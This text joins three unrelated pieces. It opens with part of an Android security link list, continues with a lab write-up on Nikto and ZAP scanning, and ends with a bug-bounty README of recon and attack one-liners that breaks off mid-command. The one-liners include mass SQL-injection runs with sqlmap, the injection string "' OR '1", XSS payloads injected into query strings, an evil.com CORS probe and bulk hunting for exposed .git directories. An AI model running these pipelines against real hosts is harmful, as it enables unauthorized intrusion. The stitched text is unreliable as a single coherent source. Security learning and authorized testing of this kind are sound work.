[kaspersky scanner](https://opentip.kaspersky.com/) #### Online APK Decompiler * [Android APK Decompiler](http://www.decompileandroid.com/) * [Java Decompiler APk](http://www.javadecompilers.com/apk) * [APK DECOMPILER APP](https://www.apkdecompilers.com/) * [DeAPK is an open-source, online APK decompiler ](https://deapk.vaibhavpandey.com/) * [apk and dex decompilation back to Java source code](http://www.decompiler.com/) * [APK Decompiler Tools](https://apk.tools/tools/apk-decompiler/alternateURL/) #### Forensic Analysis * [Forensic Analysis for Mobile Apps (FAMA)](https://github.com/labcif/FAMA) * [Andriller](https://github.com/den4uk/andriller) * [Autopsy](https://www.autopsy.com/) * [bandicoot](https://github.com/computationalprivacy/bandicoot) * [Fridump-A universal memory dumper using Frida](https://github.com/Nightbringer21/fridump) * [LiME - Linux Memory Extractor](https://github.com/504ensicsLabs/LiME) # Labs * [Damn-Vulnerable-Bank](https://github.com/rewanth1997/Damn-Vulnerable-Bank) * [OVAA (Oversecured Vulnerable Android App)](https://github.com/oversecured/ovaa) * [DIVA (Damn insecure and vulnerable App)](https://github.com/payatu/diva-android) * [OWASP Security Shepherd ](https://github.com/OWASP/SecurityShepherd) * [Damn Vulnerable Hybrid Mobile App (DVHMA)](https://github.com/logicalhacking/DVHMA) * [OWASP-mstg(UnCrackable Mobile Apps)](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes) * [VulnerableAndroidAppOracle](https://github.com/dan7800/VulnerableAndroidAppOracle) * [Android InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2) * [Purposefully Insecure and Vulnerable Android Application (PIIVA)](https://github.com/htbridge/pivaa) * [Sieve app(An android application which exploits through android components)](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) * [DodoVulnerableBank(Insecure Vulnerable Android Application that helps to learn hacing and securing apps)](https://github.com/CSPF-Founder/DodoVulnerableBank) * [Digitalbank(Android Digital Bank Vulnerable Mobile App)](https://github.com/CyberScions/Digitalbank) * [AppKnox Vulnerable Application](https://github.com/appknox/vulnerable-application) * [Vulnerable Android Application](https://github.com/Lance0312/VulnApp) * [Android Security Labs](https://github.com/SecurityCompass/AndroidLabs) * [Android-security Sandbox](https://github.com/rafaeltoledo/android-security) * [VulnDroid(CTF Style Vulnerable Android App)](https://github.com/shahenshah99/VulnDroid) * [FridaLab](https://rossmarks.uk/blog/fridalab/) * [Santoku Linux - Mobile Security VM](https://santoku-linux.com/) * [AndroL4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis](https://github.com/sh4hin/Androl4b) # Talks * [One Step Ahead of Cheaters -- Instrumenting Android Emulators](https://www.youtube.com/watch?v=L3AniAxp_G4) * [Vulnerable Out of the Box: An Evaluation of Android Carrier Devices](https://www.youtube.com/watch?v=R2brQvQeTvM) * [Rock appround the clock: Tracking malware developers by Android](https://www.youtube.com/watch?v=wd5OU9NvxjU) * [Chaosdata - Ghost in the Droid: Possessing Android Applications with ParaSpectre](https://www.youtube.com/watch?v=ohjTWylMGEA) * [Remotely Compromising Android and iOS via a Bug in Broadcom's Wi-Fi Chipsets](https://www.youtube.com/watch?v=TDk2RId8LFo) * [Honey, I Shrunk the Attack Surface – Adventures in Android Security Hardening](https://www.youtube.com/watch?v=EkL1sDMXRVk) * [Hide Android Applications in Images](https://www.youtube.com/watch?v=hajOlvLhYJY) * [Scary Code in the Heart of Android](https://www.youtube.com/watch?v=71YP65UANP0) * [Fuzzing Android: A Recipe For Uncovering Vulnerabilities Inside System Components In Android](https://www.youtube.com/watch?v=q_HibdrbIxo) * [Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Native Library](https://www.youtube.com/watch?v=s0Tqi7fuOSU) * [Android FakeID Vulnerability Walkthrough](https://www.youtube.com/watch?v=5eJYCucZ-Tc) * [Unleashing D* on Android Kernel Drivers](https://www.youtube.com/watch?v=1XavjjmfZAY) * [The Smarts Behind Hacking Dumb Devices](https://www.youtube.com/watch?v=yU1BrY1ZB2o) * [Overview of common Android app vulnerabilities](https://www.bugcrowd.com/resources/webinars/overview-of-common-android-app-vulnerabilities/) * [Advanced Android Bug Bounty skills](https://www.youtube.com/watch?v=OLgmPxTHLuY) * [Android security architecture](https://www.youtube.com/watch?v=3asW-nBU-JU) * [Get the Ultimate Privilege of Android Phone](https://vimeo.com/335948808) * [Securing the System: A Deep Dive into Reversing Android Pre-Installed Apps](https://www.youtube.com/watch?v=U6qTcpCfuFc) * [Bad Binder: Finding an Android In The Wild 0day](https://www.youtube.com/watch?v=TAwQ4ezgEIo) * [Deep dive into ART(Android Runtime) for dynamic binary analysis](https://www.youtube.com/watch?v=mFq0vNvUgj8) # Misc * [Android Malware Adventures](https://docs.google.com/presentation/d/1pYB522E71hXrp4m3fL3E3fnAaOIboJKqpbyE5gSsOes/edit) * [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md) * [Hands On Mobile API Security](https://hackernoon.com/hands-on-mobile-api-security-get-rid-of-client-secrets-a79f111b6844) * [Android Penetration Testing Courses](https://medium.com/mobile-penetration-testing/android-penetration-testing-courses-4effa36ac5ed) * [Lesser-known Tools for Android Application PenTesting](https://captmeelo.com/pentest/2019/12/30/lesser-known-tools-for-android-pentest.html) * [android-device-check - a set of scripts to check Android device security configuration](https://github.com/nelenkov/android-device-check) * [apk-mitm - a CLI application that prepares Android APK files for HTTPS inspection](https://github.com/shroudedcode/apk-mitm) * [Andriller - is software utility with a collection of forensic tools for smartphones](https://github.com/den4uk/andriller) * [Dexofuzzy: Android malware similarity clustering method using opcode sequence-Paper](https://www.virusbulletin.com/virusbulletin/2019/11/dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/) * [Chasing the Joker](https://docs.google.com/presentation/d/1sFGAERaNRuEORaH06MmZKeFRqpJo1ol1xFieUa1X_OA/edit#slide=id.p1) * [Side Channel Attacks in 4G and 5G Cellular Networks-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf) * [Shodan.io-mobile-app for Android](https://github.com/PaulSec/Shodan.io-mobile-app) * [Popular Android Malware 2019](https://github.com/sk3ptre/AndroidMalware_2019) * [Popular Android Malware 2020](https://github.com/sk3ptre/AndroidMalware_2020) * [Popular Android Malware 2021](https://github.com/sk3ptre/AndroidMalware_2021) * [Popular Android Malware 2022](https://github.com/sk3ptre/AndroidMalware_2022) # Bug Bounty & Writeups * [Hacker101 CTF: Android Challenge Writeups](https://medium.com/bugbountywriteup/hacker101-ctf-android-challenge-writeups-f830a382c3ce) * [Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f) * [RCE via Samsung Galaxy Store App](https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/) # Cheat Sheet * [Mobile Application Penetration Testing Cheat Sheet](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet) * [ADB (Android Debug Bridge) Cheat Sheet](https://www.mobileqaengineer.com/blog/2020/2/4/adb-android-debug-bridge-cheat-sheet) * [Frida Cheatsheet and Code Snippets for Android](https://erev0s.com/blog/frida-code-snippets-for-android/) # Checklists * [Android Pentesting Checklist](https://mobexler.com/checklist.htm#android) * [OWASP Mobile Security Testing Guide (MSTG)](https://github.com/OWASP/owasp-mstg/tree/master/Checklists) * [OWASP Mobile Application Security Verification Standard (MASVS)](https://github.com/OWASP/owasp-masvs) # Bug Bounty Reports * [List of Android Hackerone disclosed reports](https://github.com/B3nac/Android-Reports-and-Resources) * [How to report security issues](https://source.android.com/security/overview/updates-resources#report-issues)
# RP: Web Scanning Part of the Red Primer series, intro to web scanning. # [Task 2] ...I'm supposed to scan with that? ## #2.0 - Instructions A short quiz over the various switches used with Nikto as well as a quick scan against our target. All you'll need for this is the help menu for nikto. Include all parts of the switch unless otherwise specified, this includes - ## #2.1 - First and foremost, what switch do we use to set the target host? The `-h` flag is used to specify the host. ## #2.2 - Websites don't always properly redirect to their secure transport port and can sometimes have different issues depending on the manner in which they are scanned. How do we disable secure transport? *Hint: Secure is the difference between HTTP and HTTPS. What does that difference entail?* Use the `-nossl` to disable SSL. ## #2.3 - How about the opposite, how do we force secure transport? On the opposite, to force SSL, use the `-ssl` flag. ## #2.4 - What if we want to set a specific port to scan? By default, the port is 80. To force a different port, use the `-p` flag. ## #2.5 - As the web is constantly evolving, so is Nikto. A database of vulnerabilities represents a core component to this web scanner, how do we verify that this database is working and free from error? Use `-dbcheck` to check database and other key files for syntax errors. ## #2.6 - If instructed to, Nitko will attempt to guess and test both files within directories as well as usernames. Which switch and numerical value do we use to set Nikto to enumerate usernames in Apache? Keep in mind, this option is deprecated in favor of plugins, however, it's still a great option to be aware of for situational usage. `-mutate` is user to guess additional file names. With the value `3`, it will enumerate user names via Apache (`/~user type requests`) Answer: `-mutate 3` ## #2.7 - Suppose we know the username and password for a web forum, how do we set Nikto to do a credentialed check? Suppose the username is admin and the password is PrettyAwesomePassword1234 We would use `-id admin:PrettyAwesomePassword1234` ## #2.8 - Let's scan our target machine, what web server do we discover and what version is it? ~~~ $ nikto -h 10.10.24.129 - ***** RFIURL is not defined in nikto.conf--no RFI tests will run ***** - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.24.129 + Target Hostname: 10.10.24.129 + Target Port: 80 + Start Time: 2020-05-15 22:51:17 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) ~~~ Answer: `Apache/2.4.7` ## #2.9 - This box is vulnerable to very poor directory control due to it's web server version, what directory is indexed that really shouldn't be? *Hint: This directory allows for settings to potentially be changed remotely, allowing for us to do silly things just as just removing the metaphorical lock from the door.* ~~~ $ nikto -h 10.10.24.129 ...[SNIP]... + OSVDB-3268: /config/: Directory indexing found. + /config/: Configuration information may be available remotely. + OSVDB-3268: /config/: Directory indexing found. ~~~ Answer: `config` ## #2.10 - Nikto scans can take a while to fully complete, which switch do we set in order to limit the scan to end at a certain time? The `-until` flag allows to run until the specified time or duration. ## #2.11 - But wait, there's more! How do we list all of the plugins are available? Use the `-list-plugins` flag to list all available plugins. ## #2.12 - On the flip-side of the database, plugins represent another core component to Nikto. Which switch do we use to instruct Nikto to use plugin checks to find out of date software on the target host? Keep in mind that when testing this command we need to specify the host we intend to run this against. For submitting your answer, use only the base command with the out of date option. The `-plugin outdated` flag will do checks to see whether the web server is the latest version. ## #2.13 - Finally, what if we'd like to use our plugins to run a series of standard tests against the target host? `-plugin tests` will test host with the standard Nikto tests # [Task 3] Zip ZAP! A brief quiz and tutorial over using the OWASP Zap Scanner ## #3.1 - Let's start simple and launch zap. This can be done in a number of ways (Commands: owasp-zap, zaproxy) or through launching it in the Kali gui. No answer here. Start ZAP. ## #3.2 - Launch ZAP, what option do we set in order to specify what we are attacking? We need to defined the `URL to attack`. ## #3.3 - Launch the attack against our target! Throughout the course of this attack you may notice this is very similar to Nikto. Similar to Nessus vs. OpenVAS, Nikto and ZAP and both offer different perspectives on a host and, as such, it's useful to know how to leverage both scanning tools in order to maximize your own visibility in a situation wherein 'noise' doesn't particularly matter. !["zap attack"](files/zap-attack.png) ## #3.4 - ZAP will discover a file that typically contains pages which well-behaved web indexing engines will read in order to know which sections of a site to avoid. What is the name of this file? (Lucky for us, our scanner isn't what we would call 'well-behaved'!) Answer: `robots.txt` is a file that can disclose "hidden" sections of the website. ## #3.5 - One entry is included in the disallow section of this file, what is it? The `robots.txt` file disallows indexing of `/`: ~~~ $ curl -s http://10.10.24.129/robots.txt User-agent: * Disallow: / ~~~ ## #3.6 - ZAP will find a directory that contains images for our application, what is the path for that directory? (This is what will follows the name/ip of the website) ZAP found images in `/dvwa/images/` ## #3.7 - This website doesn't force a secure connection by default and ZAP isn't pleased with it. Which related cookie is ZAP upset about? *Hint: Check 'Alerts' within ZAP results* One of the alerts is about "No HttpOnly Flag": A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible. Answer: `HttpOnly` ## #3.8 - Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client. Answer: `Web Browser XSS Protection Not Enabled` ## #3.9 - The ZAP proxy spider represents the component responsible for 'crawling' the site. What site is found to be out of scope? !["zap-out-of-scope.png"](files/zap-out-of-scope.png) Answer: `http://www.dvwa.co.uk/` ## #3.10 - ZAP will use primarily two methods in order to scan a website, which of these two HTTP methods requests content? Answer: `GET` ## #3.11 - Which option attempts to submit content to the website? Answer: `POST`
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Gf](https://github.com/tomnomnom/gf) - [Unew](https://github.com/dwisiswant0/unew) - [Rush](https://github.com/shenwei356/rush) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Shuffledns](https://github.com/projectdiscovery/shuffledns) ### OneLiners ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash amass enum -d $1 -o amass1 ; chaos -d $1 -o chaos1 -silent ; assetfinder $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 ; findomain -t $1 -q -u findomain1 ;python3 /root/PENTESTER/github-search/github-subdomains.py -t YOURTOKEN -d $1 >> github ; cat assetfinder1 subfinder1 chaos1 amass1 findomain1 subfinder1 github >> hosts ; subfinder -dL hosts -o full -timeout 10 -silent ; httpx -l hosts -silent -threads 9000 -timeout 30 | anew domains ; rm -rf amass1 chaos1 assetfinder1 subfinder1 findomain1 github ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash wget https://raw.githubusercontent.com/KingOfBugbounty/KingOfBugBountyTips/master/downlink ; xargs -a downlink -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash tac hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | 